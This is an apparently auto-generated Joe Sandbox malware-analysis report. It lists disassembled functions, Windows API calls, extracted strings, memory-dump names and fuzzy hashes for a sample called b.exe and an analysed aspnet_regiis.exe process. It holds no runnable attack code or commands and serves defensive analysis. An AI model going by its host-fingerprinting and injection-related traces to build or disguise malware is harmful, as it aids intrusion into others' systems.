Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 8563f6d074223fe19585ac9b829ee2977a3dba2137bf75c25de561eddac6d0e9
Instruction ID: e623963f91931de79e2d19875d603c0448fefb2e4ab2da5af8194b3447c4187b
Opcode Fuzzy Hash: 8563f6d074223fe19585ac9b829ee2977a3dba2137bf75c25de561eddac6d0e9
Instruction Fuzzy Hash: 15C1A075D00259EFDF01CFA8C8809EDBBB9AF4D318F29416AE855B7752D231AD06CB60

Function 6CDE25E7 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6CDE22B5,6CDE13E0,6CDE0DF9,?,6CDE1031,?,00000001,?,?,00000001,?,6CDF0120,0000000C,6CDE112A), ref: 6CDE25F5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CDE2603
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CDE261C
SetLastError.KERNEL32(00000000,6CDE1031,?,00000001,?,?,00000001,?,6CDF0120,0000000C,6CDE112A,?,00000001,?), ref: 6CDE266E

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 81bb885f29e7a7c75346b8730a43deeef2afa2140ed72b97c92efc336ccb0120
Instruction ID: 0602ca25e8472d355331250940d8d8cf6b604fe7714bdbe5aeca36f88ef10972
Opcode Fuzzy Hash: 81bb885f29e7a7c75346b8730a43deeef2afa2140ed72b97c92efc336ccb0120
Instruction Fuzzy Hash: 0E01B532209717AEFA11277A5CCC95A2775EB0F77DF20032DE22445AF1EF5258045154

Function 6CDE4ADF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\b.exe, xrefs: 6CDE4AE4

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\b.exe
API String ID: 0-2794046411
Opcode ID: ee8e171f9a73802d6827d775a336c1d7b2ba800ed840ffd6e4975c858e39834b
Instruction ID: 29e1f84c0acb62b6af35eee8f2bfed78702ec94e1f52d7667002ae6b93c93095
Opcode Fuzzy Hash: ee8e171f9a73802d6827d775a336c1d7b2ba800ed840ffd6e4975c858e39834b
Instruction Fuzzy Hash: 97219F71604619BF9B10AFE6CC80EAB77ADAF4936C7048614F564A7A70E730EC0097A0

Function 6CDE2763 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6CDE2824,00000000,?,00000001,00000000,?,6CDE289B,00000001,FlsFree,6CDEBD3C,FlsFree,00000000), ref: 6CDE27F3

Strings

api-ms-, xrefs: 6CDE27B3

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 96f0d25dd448f86b0d151f0b87635c8a2969e0b5fa15a3978fa8e5b905400982
Instruction ID: b9f25c10c49aa635019474e39d4fe02ec283f9875bb4edaf135160cabc252f37
Opcode Fuzzy Hash: 96f0d25dd448f86b0d151f0b87635c8a2969e0b5fa15a3978fa8e5b905400982
Instruction Fuzzy Hash: D4119431A45627EBEB127B6A8C487493378AF0B778F150210E951E7AD0E660F90086E5

Function 6CDE2E1A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CDE2DCC,?,?,6CDE2D94,?,00000001,?), ref: 6CDE2E2F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CDE2E42
FreeLibrary.KERNEL32(00000000,?,?,6CDE2DCC,?,?,6CDE2D94,?,00000001,?), ref: 6CDE2E65

Strings

CorExitProcess, xrefs: 6CDE2E3A
mscoree.dll, xrefs: 6CDE2E28

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 7ac2c209e062a6167fcee29ec1a4785b636371346ba2bd129aa041100b3aebb8
Instruction ID: 1400aaeab89d8c828cd968814317a7fb4b4dafbc64b7ad57388e621d02f04004
Opcode Fuzzy Hash: 7ac2c209e062a6167fcee29ec1a4785b636371346ba2bd129aa041100b3aebb8
Instruction Fuzzy Hash: 30F05E3060171AFBEF119B50CC09B9E7A79AB09A59F100054A611A21A0CB30EA00DB98

Function 6CDE7437 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6CDE74BB
__alloca_probe_16.LIBCMT ref: 6CDE7581
__freea.LIBCMT ref: 6CDE75ED

Part of subcall function 6CDE65EC: HeapAlloc.KERNEL32(00000000,6CDE6323,6CDE6323,?,6CDE5023,00000220,?,6CDE6323,?,?,?,?,6CDE8441,00000001,?,?), ref: 6CDE661E

__freea.LIBCMT ref: 6CDE75F6
__freea.LIBCMT ref: 6CDE7619

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 9333fdb78d5ef5a941d3a2e75946795a00140250bc3f0453316b1f18e6cdecea
Instruction ID: 9ac546f4a20890a702fdc5ab6e683571a00e36de7a06f8c74f5a2c815327f9f3
Opcode Fuzzy Hash: 9333fdb78d5ef5a941d3a2e75946795a00140250bc3f0453316b1f18e6cdecea
Instruction Fuzzy Hash: 4051C172601616BBEF558F64CC40EAF3AA9EF49758F220569FD149BA61E730DD00CBA0

Function 6CDE8985 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6CDE899D

Part of subcall function 6CDE4273: HeapFree.KERNEL32(00000000,00000000,?,6CDE34AC), ref: 6CDE4289
Part of subcall function 6CDE4273: GetLastError.KERNEL32(?,?,6CDE34AC), ref: 6CDE429B

_free.LIBCMT ref: 6CDE89AF
_free.LIBCMT ref: 6CDE89C1
_free.LIBCMT ref: 6CDE89D3
_free.LIBCMT ref: 6CDE89E5

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b6d51b9c3a30749caeabb597ec878d122ba05890ed60a16222c2a3528c1205f7
Instruction ID: 7405e96ea8d29318d02d1ca75ad166c62264d85c3ae48a95150cff50be9b49cb
Opcode Fuzzy Hash: b6d51b9c3a30749caeabb597ec878d122ba05890ed60a16222c2a3528c1205f7
Instruction Fuzzy Hash: 6DF0FF31A056449BCA10EFA8EC85C5B77F9AB09728760C81AE465D7E60C734F9818AF9

Function 6CDE4377 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6CDE4999: _free.LIBCMT ref: 6CDE49A7

Part of subcall function 6CDE556D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CDE75E3,?,00000000,00000000), ref: 6CDE5619

GetLastError.KERNEL32 ref: 6CDE43DF
__dosmaperr.LIBCMT ref: 6CDE43E6
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CDE4425
__dosmaperr.LIBCMT ref: 6CDE442C

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 73794ac943604b176beb4191737e3c2e9e4b7cdd8c13a38c3fb23333b024085e
Instruction ID: 7a77f626423456e42f5d9a7d6a128cbf6a9dacd45c2ca4cc6a48a8b358d4332c
Opcode Fuzzy Hash: 73794ac943604b176beb4191737e3c2e9e4b7cdd8c13a38c3fb23333b024085e
Instruction Fuzzy Hash: 02218371604615EFDB109FE68C8095BB7ADFF0D3AC7048A19F96897E60E770EC408BA1

Function 6CDE3C77 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6CDE7F87,?,00000001,6CDE6394,?,6CDE8441,00000001,?,?,?,6CDE6323,?,00000000), ref: 6CDE3C7C
_free.LIBCMT ref: 6CDE3CD9
_free.LIBCMT ref: 6CDE3D0F
SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CDE8441,00000001,?,?,?,6CDE6323,?,00000000,00000000,6CDF0360,0000002C,6CDE6394), ref: 6CDE3D1A

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e7938321f74f9fd657c58b97e245e267e3fa0aa6fd707c7eb8ec0487f7ab753e
Instruction ID: 2b355444821fcca29aa89d1ae74bcdf91cc9a0f88094710d3df66abe2f56a024
Opcode Fuzzy Hash: e7938321f74f9fd657c58b97e245e267e3fa0aa6fd707c7eb8ec0487f7ab753e
Instruction Fuzzy Hash: 8F11CA35344645ABDA1157B64CC4E7B367AABCE77E7350224F22983AF1EB61D8144230

Function 6CDE3DCE Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000001,6CDE4208,6CDE4299,?,?,6CDE34AC), ref: 6CDE3DD3
_free.LIBCMT ref: 6CDE3E30
_free.LIBCMT ref: 6CDE3E66
SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CDE4208,6CDE4299,?,?,6CDE34AC), ref: 6CDE3E71

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 8669c1487ca4db7a841cd5fe137fdddf090ad3141b4beeb8d8ddd57b6c6a80db
Instruction ID: d8738551fbe3f1a745c62b73c30c703af793db4479db46df8a38a363c2347d1d
Opcode Fuzzy Hash: 8669c1487ca4db7a841cd5fe137fdddf090ad3141b4beeb8d8ddd57b6c6a80db
Instruction Fuzzy Hash: 1511C6323046117ADA1157B94CC09BB367AABCEBBA7650324F72993AF0EF61EC184134

Function 6CDE91D6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CDE8C30,?,00000001,?,00000001,?,6CDE7F16,?,?,00000001), ref: 6CDE91ED
GetLastError.KERNEL32(?,6CDE8C30,?,00000001,?,00000001,?,6CDE7F16,?,?,00000001,?,00000001,?,6CDE8462,6CDE6323), ref: 6CDE91F9

Part of subcall function 6CDE91BF: CloseHandle.KERNEL32(FFFFFFFE,6CDE9209,?,6CDE8C30,?,00000001,?,00000001,?,6CDE7F16,?,?,00000001,?,00000001), ref: 6CDE91CF

___initconout.LIBCMT ref: 6CDE9209

Part of subcall function 6CDE9181: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CDE91B0,6CDE8C1D,00000001,?,6CDE7F16,?,?,00000001,?), ref: 6CDE9194

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CDE8C30,?,00000001,?,00000001,?,6CDE7F16,?,?,00000001,?), ref: 6CDE921E

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: f18a52b914baa48bef598dc5200ac7145219f6ae589a3702509e37ff8f03d9c2
Instruction ID: edd2dc2be0917308eda63d63428bcb719aed24f5eba13b6024248456ce7268ef
Opcode Fuzzy Hash: f18a52b914baa48bef598dc5200ac7145219f6ae589a3702509e37ff8f03d9c2
Instruction Fuzzy Hash: 07F01C36601154BBDF522F92DC089CE3F76EB4E3B4F454111FB1985630C6329820DB98

Function 6CDE35A4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6CDE35AD

Part of subcall function 6CDE4273: HeapFree.KERNEL32(00000000,00000000,?,6CDE34AC), ref: 6CDE4289
Part of subcall function 6CDE4273: GetLastError.KERNEL32(?,?,6CDE34AC), ref: 6CDE429B

_free.LIBCMT ref: 6CDE35C0
_free.LIBCMT ref: 6CDE35D1
_free.LIBCMT ref: 6CDE35E2

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2a6f57a65527565f33d95ff2a950645d9e8654fed7999cdd8b4add78a1606c2f
Instruction ID: c0bff5dca69d7a71ce482441efdcc25d34f7bbf8ea2d30a941e064037f6950b2
Opcode Fuzzy Hash: 2a6f57a65527565f33d95ff2a950645d9e8654fed7999cdd8b4add78a1606c2f
Instruction Fuzzy Hash: E4E0BF75A101A0DB8F117FA6D8444863E71A75E60D301C517E40412724C735997BEFB9

Function 6CDE2EA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\b.exe, xrefs: 6CDE2EEB, 6CDE2EF2, 6CDE2F28

Memory Dump Source

Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true

Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\b.exe
API String ID: 0-2794046411
Opcode ID: 4dab374582a9c95d9efb60c15971b02ee4e01c2a53d2da4a24a8f9a5f39b6811
Instruction ID: ae7588663cbe573ecaf6baaea59615a3aa0746610924e7e0d4e6bcd1d7ddf725
Opcode Fuzzy Hash: 4dab374582a9c95d9efb60c15971b02ee4e01c2a53d2da4a24a8f9a5f39b6811
Instruction Fuzzy Hash: 37418571A04259EBDB11DF9ACC84A9EBBF8EF9D31CF10406AE414A7B20D7709A45CB60

Analysis Process: aspnet_regiis.exePID: 7728, Parent PID: 7648COMMON

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	26%
Total number of Nodes:	304
Total number of Limit Nodes:	30

Executed Functions

Function 0247AAE0 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 429
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(02485678,00000000,00000001,02485668,00000000), ref: 0247ABDC
SysAllocString.OLEAUT32 ref: 0247AC48
CoSetProxyBlanket.COMBASE(899A8F55,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0247AC91
SysAllocString.OLEAUT32 ref: 0247AD0B
SysAllocString.OLEAUT32 ref: 0247AD95
VariantInit.OLEAUT32(?), ref: 0247AE00
VariantClear.OLEAUT32(?), ref: 0247AF67
SysFreeString.OLEAUT32(?), ref: 0247AF8B
SysFreeString.OLEAUT32(?), ref: 0247AF91
SysFreeString.OLEAUT32(?), ref: 0247AFA5
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0247AFD6

Strings

R[, xrefs: 0247AB16
\, xrefs: 0247AB96
e], xrefs: 0247AAFE
Q:, xrefs: 0247AB0E
HI, xrefs: 0247AD74
C, xrefs: 0247AB8E
2zS, xrefs: 0247ACB8
dW, xrefs: 0247AB06

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: 2zS$C$HI$Q:$R[$\$dW$e]
API String ID: 2573436264-720759029
Opcode ID: 69573046693562a46a6d145102ebe27b61b7888f98bf1b5746cec039508f7334
Instruction ID: f348c824c4ed3a9bf8ddf4d11ec973389452ba38b528a1f79563d53c588c9933
Opcode Fuzzy Hash: 69573046693562a46a6d145102ebe27b61b7888f98bf1b5746cec039508f7334
Instruction Fuzzy Hash: B3E1EAB1A48350AFE310DF24CC85B9FBBE5EB85714F04892DFAA59B280D775D805CB92

Function 0245A4DA Relevance: 13.5, APIs: 1, Strings: 6, Instructions: 1286COMMON

Download Yara Rule

Strings

).)(, xrefs: 0245AE15
qt, xrefs: 0245B20B
2, xrefs: 0245B075
, xrefs: 0245B404
xO, xrefs: 0245A53E
<=, xrefs: 0245B28F

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: $).)($2$<=$qt$xO
API String ID: 0-2945988728
Opcode ID: f8fabf440a7b9042b693a7f35c1ae3d3161fe01e4cf3c929672d282a96b7bd7b
Instruction ID: 3fccef818d6e273b724e18695d354586c106a0c3e0f76f192f891aeacf2548ef
Opcode Fuzzy Hash: f8fabf440a7b9042b693a7f35c1ae3d3161fe01e4cf3c929672d282a96b7bd7b
Instruction Fuzzy Hash: CA92FFB19093918BD734DF28D8957AFB7E1EF85314F044A2DD8C98B392EB349951CB82

Function 02466618 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 415
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

sq, xrefs: 02466A67, 02466A6B
wu, xrefs: 02466976
k8i, xrefs: 0246697E
I=[;, xrefs: 02466AEC
\], xrefs: 02466B2C

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: I=[;$\]$k8i$sq$wu
API String ID: 0-747998150
Opcode ID: 580b738780a250b737b2de30fdddb06286f81d937b907374c0c194b685a4d755
Instruction ID: e61ba904dd6f579865f373b978278442f3e2dba8bf661f28f3268edeb1323a5d
Opcode Fuzzy Hash: 580b738780a250b737b2de30fdddb06286f81d937b907374c0c194b685a4d755
Instruction Fuzzy Hash: C2D1B6B05183408FD7109F69E89162FBBF4EB82758F048A2DF9958B351E778C909CB83

Function 02448C70 Relevance: 7.6, APIs: 5, Instructions: 148
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02448C92
GetCurrentThreadId.KERNEL32 ref: 02448CA5
GetCurrentProcessId.KERNEL32 ref: 02448CF8
GetForegroundWindow.USER32 ref: 02448D9A
ExitProcess.KERNEL32 ref: 02448E49

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: f290e80cf37ce84e27e4f150575dbf2c79f58387bd4a46664ef7f07cf2cd205a
Instruction ID: 162c3273e57c8990811854247e461bcc2da09baf139da0a8afd233ce6b1b7a74
Opcode Fuzzy Hash: f290e80cf37ce84e27e4f150575dbf2c79f58387bd4a46664ef7f07cf2cd205a
Instruction Fuzzy Hash: 2A417F33B4071C1BE714AABADC5A39BB6C65BC4614F0A842EDD84DF391FE688C058684

Function 0246E398 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hzQ, xrefs: 0246EF9C
A0*#, xrefs: 0246EFA6
_mQ#, xrefs: 0246F148

Memory Dump Source

Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true

Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: hzQ$A0*#$_mQ#
API String ID: 0-649192675
Opcode ID: 4be9e114f4826ca406262260a5353c8dbe1d7b16e8df7351e7b6fcdbe6872f53
Instruction ID: de886982b22257f0782294d8bc65c49406540ef0d207c331a651ccc23139c871
Opcode Fuzzy Hash: 4be9e114f4826ca406262260a5353c8dbe1d7b16e8df7351e7b6fcdbe6872f53
Instruction Fuzzy Hash: 43D1E871605B818FD72ACF35C4647B3BBD2AF96204F0889AEC4DB8BB42D7796409CB11

